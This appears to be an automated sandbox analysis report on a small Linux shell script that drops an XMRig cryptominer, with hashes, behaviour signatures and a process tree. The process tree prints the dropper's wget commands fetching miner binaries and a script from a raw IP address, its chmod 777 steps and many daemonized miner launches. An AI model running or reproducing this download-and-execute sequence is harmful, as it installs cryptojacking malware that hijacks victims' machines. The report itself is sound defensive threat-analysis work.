Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    24/10/2024, 01:53

General

  • Target

    8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh

  • Size

    244B

  • MD5

    9206fb1df325876fc6297e75be2a7d5a

  • SHA1

    2361ae7b1d637d0a4259f67cc36c2af142541262

  • SHA256

    8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb

  • SHA512

    12ce08238c8fc3e8591700718e3018c8405b946f38360655c394bc6801f7204b27c505f981da161fe16c3f570eb066c367ff86aa73163b3b7ddc37d3e14c3402

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 43 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 64 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads hardware information 1 TTPs 64 IoCs

    Accesses system information such as serial numbers, manufacturer names, etc.

  • Checks CPU configuration 1 TTPs 41 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 64 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 46 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
    /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
    1⤵
      PID:1520
      • /usr/bin/wget
        wget http://45.202.35.107/xmrigDaemon
        2⤵
        • Writes file to tmp directory
        PID:1521
      • /usr/bin/wget
        wget http://45.202.35.107/xmrigMiner
        2⤵
        • Writes file to tmp directory
        PID:1525
      • /usr/bin/wget
        wget http://45.202.35.107/config.json
        2⤵
        • Writes file to tmp directory
        PID:1526
      • /usr/bin/wget
        wget http://45.202.35.107/check.sh
        2⤵
        • Writes file to tmp directory
        PID:1527
      • /bin/chmod
        chmod 777 xmrigMiner
        2⤵
        • File and Directory Permissions Modification
        PID:1528
      • /bin/chmod
        chmod 777 xmrigDaemon
        2⤵
        • File and Directory Permissions Modification
        PID:1529
      • /bin/chmod
        chmod 777 check.sh
        2⤵
        • File and Directory Permissions Modification
        PID:1530
    • /tmp/check.sh
      ./check.sh
      1⤵
      • Executes dropped EXE
      PID:1531
      • /usr/bin/pgrep
        pgrep -f xmrigDaemon
        2⤵
        • Reads runtime system information
        PID:1532
      • /tmp/xmrigDaemon
        ./xmrigDaemon
        2⤵
        • Executes dropped EXE
        PID:1533
        • /bin/sh
          sh -c "\"./xmrigMiner\" --daemonized"
          3⤵
            PID:1534
            • /tmp/xmrigMiner
              ./xmrigMiner --daemonized
              4⤵
              • Executes dropped EXE
              • Checks hardware identifiers (DMI)
              • Reads hardware information
              • Checks CPU configuration
              • Reads CPU attributes
              • Reads runtime system information
              • Writes file to tmp directory
              PID:1535
          • /bin/sh
            sh -c "\"./xmrigMiner\" --daemonized"
            3⤵
              PID:1542
              • /tmp/xmrigMiner
                ./xmrigMiner --daemonized
                4⤵
                • Executes dropped EXE
                • Checks hardware identifiers (DMI)
                • Reads hardware information
                • Checks CPU configuration
                • Reads CPU attributes
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:1543
            • /bin/sh
              sh -c "\"./xmrigMiner\" --daemonized"
              3⤵
                PID:1550
                • /tmp/xmrigMiner
                  ./xmrigMiner --daemonized
                  4⤵
                  • Executes dropped EXE
                  • Checks hardware identifiers (DMI)
                  • Reads hardware information
                  • Checks CPU configuration
                  • Enumerates kernel/hardware configuration
                  • Writes file to tmp directory
                  PID:1551
              • /bin/sh
                sh -c "\"./xmrigMiner\" --daemonized"
                3⤵
                  PID:1558
                  • /tmp/xmrigMiner
                    ./xmrigMiner --daemonized
                    4⤵
                    • Executes dropped EXE
                    • Checks hardware identifiers (DMI)
                    • Reads hardware information
                    • Checks CPU configuration
                    • Reads CPU attributes
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:1559
                • /bin/sh
                  sh -c "\"./xmrigMiner\" --daemonized"
                  3⤵
                    PID:1566
                    • /tmp/xmrigMiner
                      ./xmrigMiner --daemonized
                      4⤵
                      • Executes dropped EXE
                      • Checks hardware identifiers (DMI)
                      • Reads hardware information
                      • Checks CPU configuration
                      • Reads CPU attributes
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:1567
                  • /bin/sh
                    sh -c "\"./xmrigMiner\" --daemonized"
                    3⤵
                      PID:1574
                      • /tmp/xmrigMiner
                        ./xmrigMiner --daemonized
                        4⤵
                        • Executes dropped EXE
                        • Checks hardware identifiers (DMI)
                        • Reads hardware information
                        • Checks CPU configuration
                        • Reads CPU attributes
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:1575
                    • /bin/sh
                      sh -c "\"./xmrigMiner\" --daemonized"
                      3⤵
                        PID:1582
                        • /tmp/xmrigMiner
                          ./xmrigMiner --daemonized
                          4⤵
                          • Executes dropped EXE
                          • Checks hardware identifiers (DMI)
                          • Reads hardware information
                          • Checks CPU configuration
                          • Reads CPU attributes
                          • Writes file to tmp directory
                          PID:1583
                      • /bin/sh
                        sh -c "\"./xmrigMiner\" --daemonized"
                        3⤵
                          PID:1590
                          • /tmp/xmrigMiner
                            ./xmrigMiner --daemonized
                            4⤵
                            • Executes dropped EXE
                            • Reads hardware information
                            • Checks CPU configuration
                            • Enumerates kernel/hardware configuration
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:1591
                        • /bin/sh
                          sh -c "\"./xmrigMiner\" --daemonized"
                          3⤵
                            PID:1598
                            • /tmp/xmrigMiner
                              ./xmrigMiner --daemonized
                              4⤵
                              • Executes dropped EXE
                              • Checks hardware identifiers (DMI)
                              • Reads hardware information
                              • Checks CPU configuration
                              • Reads CPU attributes
                              • Enumerates kernel/hardware configuration
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:1599
                          • /bin/sh
                            sh -c "\"./xmrigMiner\" --daemonized"
                            3⤵
                              PID:1606
                              • /tmp/xmrigMiner
                                ./xmrigMiner --daemonized
                                4⤵
                                • Executes dropped EXE
                                • Reads hardware information
                                • Checks CPU configuration
                                • Enumerates kernel/hardware configuration
                                • Writes file to tmp directory
                                PID:1607
                            • /bin/sh
                              sh -c "\"./xmrigMiner\" --daemonized"
                              3⤵
                                PID:1614
                                • /tmp/xmrigMiner
                                  ./xmrigMiner --daemonized
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks hardware identifiers (DMI)
                                  • Reads hardware information
                                  • Checks CPU configuration
                                  • Enumerates kernel/hardware configuration
                                  • Writes file to tmp directory
                                  PID:1615
                              • /bin/sh
                                sh -c "\"./xmrigMiner\" --daemonized"
                                3⤵
                                  PID:1622
                                  • /tmp/xmrigMiner
                                    ./xmrigMiner --daemonized
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks hardware identifiers (DMI)
                                    • Reads hardware information
                                    • Checks CPU configuration
                                    • Reads CPU attributes
                                    • Enumerates kernel/hardware configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:1623
                                • /bin/sh
                                  sh -c "\"./xmrigMiner\" --daemonized"
                                  3⤵
                                    PID:1630
                                    • /tmp/xmrigMiner
                                      ./xmrigMiner --daemonized
                                      4⤵
                                      • Executes dropped EXE
                                      • Checks hardware identifiers (DMI)
                                      • Reads hardware information
                                      • Checks CPU configuration
                                      • Writes file to tmp directory
                                      PID:1631
                                  • /bin/sh
                                    sh -c "\"./xmrigMiner\" --daemonized"
                                    3⤵
                                      PID:1640
                                      • /tmp/xmrigMiner
                                        ./xmrigMiner --daemonized
                                        4⤵
                                        • Executes dropped EXE
                                        • Checks hardware identifiers (DMI)
                                        • Reads hardware information
                                        • Checks CPU configuration
                                        • Reads CPU attributes
                                        • Enumerates kernel/hardware configuration
                                        • Writes file to tmp directory
                                        PID:1641
                                    • /bin/sh
                                      sh -c "\"./xmrigMiner\" --daemonized"
                                      3⤵
                                        PID:1648
                                        • /tmp/xmrigMiner
                                          ./xmrigMiner --daemonized
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks hardware identifiers (DMI)
                                          • Reads hardware information
                                          • Checks CPU configuration
                                          • Reads CPU attributes
                                          • Enumerates kernel/hardware configuration
                                          • Writes file to tmp directory
                                          PID:1649
                                      • /bin/sh
                                        sh -c "\"./xmrigMiner\" --daemonized"
                                        3⤵
                                          PID:1656
                                          • /tmp/xmrigMiner
                                            ./xmrigMiner --daemonized
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks CPU configuration
                                            • Reads CPU attributes
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:1657
                                        • /bin/sh
                                          sh -c "\"./xmrigMiner\" --daemonized"
                                          3⤵
                                            PID:1664
                                            • /tmp/xmrigMiner
                                              ./xmrigMiner --daemonized
                                              4⤵
                                              • Executes dropped EXE
                                              • Checks hardware identifiers (DMI)
                                              • Reads hardware information
                                              • Checks CPU configuration
                                              • Reads CPU attributes
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:1665
                                          • /bin/sh
                                            sh -c "\"./xmrigMiner\" --daemonized"
                                            3⤵
                                              PID:1672
                                              • /tmp/xmrigMiner
                                                ./xmrigMiner --daemonized
                                                4⤵
                                                • Executes dropped EXE
                                                • Checks hardware identifiers (DMI)
                                                • Reads hardware information
                                                • Checks CPU configuration
                                                • Reads CPU attributes
                                                • Enumerates kernel/hardware configuration
                                                • Writes file to tmp directory
                                                PID:1673
                                            • /bin/sh
                                              sh -c "\"./xmrigMiner\" --daemonized"
                                              3⤵
                                                PID:1680
                                                • /tmp/xmrigMiner
                                                  ./xmrigMiner --daemonized
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Checks hardware identifiers (DMI)
                                                  • Reads hardware information
                                                  • Checks CPU configuration
                                                  • Enumerates kernel/hardware configuration
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:1681
                                              • /bin/sh
                                                sh -c "\"./xmrigMiner\" --daemonized"
                                                3⤵
                                                  PID:1688
                                                  • /tmp/xmrigMiner
                                                    ./xmrigMiner --daemonized
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Checks hardware identifiers (DMI)
                                                    • Checks CPU configuration
                                                    • Reads CPU attributes
                                                    • Writes file to tmp directory
                                                    PID:1689
                                                • /bin/sh
                                                  sh -c "\"./xmrigMiner\" --daemonized"
                                                  3⤵
                                                    PID:1696
                                                    • /tmp/xmrigMiner
                                                      ./xmrigMiner --daemonized
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks hardware identifiers (DMI)
                                                      • Reads hardware information
                                                      • Checks CPU configuration
                                                      • Reads CPU attributes
                                                      • Enumerates kernel/hardware configuration
                                                      • Reads runtime system information
                                                      • Writes file to tmp directory
                                                      PID:1697
                                                  • /bin/sh
                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                    3⤵
                                                      PID:1704
                                                      • /tmp/xmrigMiner
                                                        ./xmrigMiner --daemonized
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Checks hardware identifiers (DMI)
                                                        • Reads hardware information
                                                        • Checks CPU configuration
                                                        • Reads CPU attributes
                                                        • Enumerates kernel/hardware configuration
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:1705
                                                    • /bin/sh
                                                      sh -c "\"./xmrigMiner\" --daemonized"
                                                      3⤵
                                                        PID:1712
                                                        • /tmp/xmrigMiner
                                                          ./xmrigMiner --daemonized
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Checks hardware identifiers (DMI)
                                                          • Checks CPU configuration
                                                          • Reads CPU attributes
                                                          • Enumerates kernel/hardware configuration
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:1713
                                                      • /bin/sh
                                                        sh -c "\"./xmrigMiner\" --daemonized"
                                                        3⤵
                                                          PID:1720
                                                          • /tmp/xmrigMiner
                                                            ./xmrigMiner --daemonized
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Checks hardware identifiers (DMI)
                                                            • Checks CPU configuration
                                                            • Reads CPU attributes
                                                            • Enumerates kernel/hardware configuration
                                                            • Writes file to tmp directory
                                                            PID:1721
                                                        • /bin/sh
                                                          sh -c "\"./xmrigMiner\" --daemonized"
                                                          3⤵
                                                            PID:1728
                                                            • /tmp/xmrigMiner
                                                              ./xmrigMiner --daemonized
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Checks hardware identifiers (DMI)
                                                              • Reads hardware information
                                                              • Checks CPU configuration
                                                              • Enumerates kernel/hardware configuration
                                                              • Writes file to tmp directory
                                                              PID:1729
                                                          • /bin/sh
                                                            sh -c "\"./xmrigMiner\" --daemonized"
                                                            3⤵
                                                              PID:1736
                                                              • /tmp/xmrigMiner
                                                                ./xmrigMiner --daemonized
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Reads hardware information
                                                                • Checks CPU configuration
                                                                • Reads CPU attributes
                                                                • Writes file to tmp directory
                                                                PID:1737
                                                            • /bin/sh
                                                              sh -c "\"./xmrigMiner\" --daemonized"
                                                              3⤵
                                                                PID:1744
                                                                • /tmp/xmrigMiner
                                                                  ./xmrigMiner --daemonized
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Checks hardware identifiers (DMI)
                                                                  • Reads hardware information
                                                                  • Checks CPU configuration
                                                                  • Enumerates kernel/hardware configuration
                                                                  • Writes file to tmp directory
                                                                  PID:1745
                                                              • /bin/sh
                                                                sh -c "\"./xmrigMiner\" --daemonized"
                                                                3⤵
                                                                  PID:1752
                                                                  • /tmp/xmrigMiner
                                                                    ./xmrigMiner --daemonized
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Reads hardware information
                                                                    • Checks CPU configuration
                                                                    • Reads CPU attributes
                                                                    • Enumerates kernel/hardware configuration
                                                                    • Writes file to tmp directory
                                                                    PID:1753
                                                                • /bin/sh
                                                                  sh -c "\"./xmrigMiner\" --daemonized"
                                                                  3⤵
                                                                    PID:1760
                                                                    • /tmp/xmrigMiner
                                                                      ./xmrigMiner --daemonized
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Checks hardware identifiers (DMI)
                                                                      • Checks CPU configuration
                                                                      • Reads CPU attributes
                                                                      • Reads runtime system information
                                                                      • Writes file to tmp directory
                                                                      PID:1761
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1768
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1769
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1776
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1777
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1784
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1785
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1792
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1793
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1800
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Writes file to tmp directory
                                                                        PID:1801
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1808
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Writes file to tmp directory
                                                                        PID:1809
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1816
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1817
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1824
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1825
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1832
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1833
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1840
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1841
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1848
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1849
                                                                  • /bin/sh
                                                                    sh -c "\"./xmrigMiner\" --daemonized"
                                                                    3⤵
                                                                      PID:1856
                                                                      • /tmp/xmrigMiner
                                                                        ./xmrigMiner --daemonized
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks hardware identifiers (DMI)
                                                                        • Reads hardware information
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Enumerates kernel/hardware configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:1857

Network

MITRE ATT&CK Enterprise v15

Downloads

• /tmp/check.sh
  Filesize: 823B
  MD5: 3284592438c4df2dd14b74cec93c6015
  SHA1: 1662db32dd1b9ebcf38b20b8d6c2212912bf250e
  SHA256: b456d2835bda6f651883e81201e12e4b7fbb9ad644f17016fbf5553c155cf958
  SHA512: 54af1b77dcad7a64a5e5abfae973770e3702dad5f6c3a4738e06ae1cb2a677dea08bb3360a68a8ae9a0dec3d35355a7ecc0351bbe686f9f3ae55abfcc92b0af2

• /tmp/logggz.lgo
  Filesize: 39KB
  MD5: 68ca711184451bc4e72c5b615d4a8b5c
  SHA1: d9a0f0fd8bdb37fdea7596ab52be43c254c81790
  SHA256: ed2e669b35586da965d1579844463bcb26e73bcc38152f34bbae1529ea2330d9
  SHA512: e6baa4fe37954cc820c8700f1a153865cee4b5d02c5caad295148c0e45714ed5cb3e42ca5c494ca9feb8e32f2ae550b2c2ea7e9e517fcb6d7857ef5e9bc3b851

• /tmp/xmrigDaemon
  Filesize: 629KB
  MD5: bd98e7c9ca771be14cd9229bc1636732
  SHA1: 4a4723378eb0268f4659f1b1d3f2be5f74e20b87
  SHA256: 0ea2d73e47b8642b24371be112fb04e455bc8577fa17911bd17793887cedeb7e
  SHA512: cd641b0325242bfec608fae6d09c716d2a6519bf2aafeef025e7330c2c1e1c63d90b1b15307adcfa3d3fd4ccaff4003d4facc68038283f7b47ecdfd631380608

• /tmp/xmrigMiner
  Filesize: 7.9MB
  MD5: 98d1e494adf9aa586221feeaa74aaf8a
  SHA1: 2cbc1044034e21dbaaea4afce3aef772aa468041
  SHA256: c58301ea640b622c52599d530e2a4d302025d4b23dca1b78f61405655733207f
  SHA512: fdd937825c461ce010697b2bb44c6e78bdc7be682c49c4339719a1d2d4c3f38930dd8a0277461ce93f4cc80474a22836a20877da447cb8f8b73ce8182a2a0791